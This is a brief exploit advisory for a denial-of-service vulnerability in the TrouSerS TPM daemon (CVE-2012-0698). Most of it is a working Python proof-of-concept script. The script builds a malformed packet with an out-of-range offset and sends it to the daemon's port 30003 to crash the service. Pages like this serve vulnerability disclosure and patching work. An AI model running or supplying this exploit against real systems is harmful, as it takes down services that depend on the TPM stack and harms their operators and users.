TrouSerS Denial Of Service Exploit

Summary

TrouSerS suffers from denial of service vulnerability.

Credit:

The information has been provided by Andy Lutomirski.


Details

Vulnerable Systems:
 * TrouSerS

import struct
import socket
import time

# UnloadBlob_PCR_EVENT also appears buggy.

crasher = struct.pack(‘>IIIIIII’,
28, # packet_size = sizeof(tcsd_packet_hdr)
11, # ordinal: LoadKeyByBlob
1, # num_parms = 1 (so first getData doesn’t bail)
0, # type_size = 0
0x80000000, # type_offset is off in lala land
0, # parm_size = 0 (skip checking)
28, # parm_offset: see getTCSDPacket
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.connect((‘127.0.0.1’, 30003))
s.send(crasher)
s.shutdown(socket.SHUT_WR)
s.close()

CVE Information:
CVE: 2012-0698

Disclosure Timeline:
Published: 2012-11-23

Categories: Exploits